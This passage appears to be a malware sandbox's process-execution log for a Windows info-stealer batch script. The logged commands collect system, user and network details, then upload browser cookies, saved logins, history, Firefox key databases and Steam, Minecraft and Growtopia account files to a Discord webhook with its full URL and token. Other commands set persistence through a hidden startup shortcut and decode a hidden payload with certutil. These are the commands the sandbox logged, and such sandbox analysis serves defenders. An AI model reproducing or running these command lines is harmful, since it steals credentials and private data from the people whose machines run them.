C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\992672351865417544.lnk"4⤵
- Drops startup file
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c 2>NUL ping -4 -n 1 GYLQWJCN | findstr [4⤵
-
C:\Windows\system32\PING.EXEping -4 -n 1 GYLQWJCN5⤵
- Runs ping.exe
-
C:\Windows\system32\findstr.exefindstr [5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell Invoke-RestMethod api.ipify.org4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Invoke-RestMethod api.ipify.org5⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\curl.execurl -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"```[ 1. Report from Admin - 10.127.0.105 @ 12:32:18.08 ] \nBatch process started...```\"}" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\curl.execurl -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"```[ Version info from Admin - 10.127.0.105 @ 12:32:18.44 ] \n Version - 1.2.0 (MADE BY GHOST.exe)```\"}" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\systeminfo.exeSystemInfo4⤵
- Gathers system information
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F systeminfo=@"C:\Users\Admin\AppData\Roaming\sysinfo.txt" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\tasklist.exetasklist4⤵
- Enumerates processes with tasklist
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F tasks=@"C:\Users\Admin\AppData\Roaming\tasklist.txt" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\net.exenet user4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user5⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F tasks=@"C:\Users\Admin\AppData\Roaming\netuser.txt" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\quser.exequser4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F tasks=@"C:\Users\Admin\AppData\Roaming\quser.txt" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\reg.exereg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run4⤵
- Modifies registry key
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F tasks=@"C:\Users\Admin\AppData\Roaming\stup.txt" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\cmdkey.execmdkey /list4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F tasks=@"C:\Users\Admin\AppData\Roaming\cmdkey.txt" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\ipconfig.exeipconfig /all4⤵
- Gathers network information
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F tasks=@"C:\Users\Admin\AppData\Roaming\ipconfig.txt" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"```- MICROSOFT EDGE // from Admin - 10.127.0.105 @ 12:32:24.47```\"}" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F hstry=@"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F tasks=@"Cookies" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F tasks=@"Cookies-journal" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F tasks=@"Network Persistent State" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F tasks=@"NetworkDataMigrated" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F tasks=@"Reporting and NEL" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F tasks=@"Reporting and NEL-journal" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F tasks=@"SCT Auditing Pending Reports" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F tasks=@"Sdch Dictionaries" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F tasks=@"TransportSecurity" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F tasks=@"Trust Tokens" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F tasks=@"Trust Tokens-journal" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"```- CHROME // from Admin - 10.127.0.105 @ 12:32:29.97```\"}" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F tasks=@"Cookies" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F tasks=@"Cookies-journal" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F tasks=@"Network Persistent State" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F tasks=@"NetworkDataMigrated" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F tasks=@"Reporting and NEL" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F tasks=@"Reporting and NEL-journal" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F tasks=@"SCT Auditing Pending Reports" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F tasks=@"TransportSecurity" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F h=@"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\History" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\timeout.exetimeout /t 1 /nobreak4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F s=@"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Shortcuts" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F b=@"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Bookmarks" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F l=@"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Login Data" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\timeout.exetimeout /t 1 /nobreak4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F l=@"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\timeout.exetimeout /t 1 /nobreak4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"```- OPERA // from Admin - 10.127.0.105 @ 12:32:40.12```\"}" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F c=@"C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Cookies" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F h=@"C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\History" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\timeout.exetimeout /t 1 /nobreak4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F s=@"C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Shortcuts" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F b=@"C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Bookmarks" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F l=@"C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Login Data" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\timeout.exetimeout /t 1 /nobreak4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"```- VIVALDI // from Admin - 10.127.0.105 @ 12:32:43.21```\"}" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F c=@"C:\Users\Admin\AppData\Local\Vivaldi\User Data\Default\Cookies" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F h=@"C:\Users\Admin\AppData\Local\Vivaldi\User Data\Default\History" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\timeout.exetimeout /t 1 /nobreak4⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F s=@"C:\Users\Admin\AppData\Local\Vivaldi\User Data\Default\Shortcuts" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F b=@"C:\Users\Admin\AppData\Local\Vivaldi\User Data\Default\Bookmarks" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F l=@"C:\Users\Admin\AppData\Local\Vivaldi\User Data\Default\Login Data" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\timeout.exetimeout /t 1 /nobreak4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"```- FIREFOX // from Admin - 10.127.0.105 @ 12:32:45.19```\"}" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c 2>NUL dir /b "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles"4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F level=@"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kwvh0l1k.Admin\logins.json" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\timeout.exetimeout /t 1 /nobreak4⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F level=@"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kwvh0l1k.Admin\key3.db" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F level=@"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kwvh0l1k.Admin\key4.db" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F level=@"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kwvh0l1k.Admin\cookies.sqlite" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\timeout.exetimeout /t 1 /nobreak4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F level=@"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n9vxbo99.default-release\logins.json" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\timeout.exetimeout /t 1 /nobreak4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F level=@"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n9vxbo99.default-release\key3.db" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F level=@"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n9vxbo99.default-release\key4.db" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F level=@"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n9vxbo99.default-release\cookies.sqlite" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\timeout.exetimeout /t 1 /nobreak4⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"```- osu! // from Admin - 10.127.0.105 @ 12:32:52.14```\"}" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F c=@"C:\Users\Admin\AppData\Local\osu!\osu!.Admin.cfwh4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"```- DISCORD // from Admin - 10.127.0.105 @ 12:32:52.63```\"}" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c 2>NUL dir /b "C:\Users\Admin\AppData\Roaming\discord\Local Storage\leveldb\"4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"```- STEAM // from Admin - 10.127.0.105 @ 12:32:53.02```\"}" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F steamusers=@"C:\Program Files (x86)\Steam\config\loginusers.vdf" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F loginusers=@"C:\Program Files\Steam\config\loginusers.vdf" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c 2>NUL dir /b "C:\Program Files (x86)\Steam\"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c 2>NUL dir /b "C:\Program Files\Steam\"4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"```- MINECRAFT // from Admin - 10.127.0.105 @ 12:32:53.68```\"}" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F steamusers=@"C:\Users\Admin\AppData\Roaming\.minecraft\launcher_profiles.json" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F steamusers=@"C:\Users\Admin\AppData\Roaming\.minecraft\launcher_accounts.json" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\timeout.exetimeout /t 1 /nobreak4⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"```- GROWTOPIA // from Admin - 10.127.0.105 @ 12:32:55.21```\"}" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F save.dat=@"C:\Users\Admin\AppData\Local\Growtopia\save.dat" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\attrib.exeAttrib +h +s Do_Not_Delete..file4⤵
-
C:\Windows\system32\certutil.execertutil -decode Do_Not_Delete..file System.exe4⤵
-
C:\Windows\system32\timeout.exetimeout 2 /nobreak4⤵
-
C:\Windows\system32\attrib.exeAttrib +h +s System.exe4⤵
-
C:\Windows\system32\attrib.exeAttrib -h -s Do_Not_Delete..file4⤵
-
C:\Windows\system32\mode.commode con cols=150 lines=304⤵
-
C:\Windows\system32\attrib.exeattrib -h -s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir /b /s *.jpg4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir /b /s *.mp34⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir /b /s *.mp44⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir /b /s *.gif4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir /b /s *.txt4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
